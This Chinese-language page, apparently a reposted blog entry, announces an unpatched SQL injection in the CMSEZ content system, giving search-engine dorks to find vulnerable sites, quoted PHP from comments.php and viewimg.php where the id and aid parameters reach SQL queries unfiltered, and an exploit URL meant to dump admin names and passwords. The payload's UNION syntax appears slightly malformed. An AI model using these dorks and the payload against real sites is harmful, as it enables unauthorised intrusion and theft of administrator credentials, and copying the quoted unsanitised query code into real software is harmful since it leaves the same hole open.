inur new.php id,Cmsez(随易)全站系统注入0day漏洞预警 -电脑资料

allinurl:"owered by CMSEZ" comments.php inurlowered by CMSEZ

漏洞代码:mainfile.php

//comments

include "mainfile.php";

$art=new article();

//设定

$confirm='yes';//yes:需要管理员认证后才能显示,no:直接显示

$member=new member();

$user_info=$member->member_auth();

$ulevel=$user_info[user_level];

########设置#############

$action = $_REQUEST[action];

$page="10";//

$need_user = "0";//

$id = $_REQUEST[id];// //对ID参数完全没过滤

$fdb = $PlusDB->prefix(forum);//评论的数据库

switch($action){

case "showNum":

$sql="select count(*) as num from ".$fdb." where post_aid='$id'";

$showNum=$PlusDB->getone($sql);

echo "

function comment(id)

{

var page = \"".PLUS_URL."/comments.php?id=\" + id ;

popwin = window.open(page,\"\",\"width=460,height=500,scrollbars,resizable\")

popwin.focus();

}

document.open();

document.write(\""._LANG_0931." $showNum "._LANG_0932."\");

document.close();";

break;

case "saveComment":

viewimg.php

//image.php 显示附件的图片

include "mainfile.php";

$member=new member();

$confirm==false;//true 会员才能看,false 都能看

$user_info = $member->member_auth();

if($user_info[user_level]=="Guest" && $confirm==true){

include "modules/member/index.php";

}else{

$imgdb = $PlusDB->prefix(images);

$id=$_GET[id]; //米过滤,为什么他要直接获得啊!

$aid = $_GET[aid]; //难道赶着吃晚饭?

$sql="select id from $imgdb where aid=$aid order by id ";

exp:

http://localhost/comments.php?id=1111111111111/**/union/**/1,concat(name,0x3a,pass),2,3,4/**/from/**/admin/*

form.:小帅

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值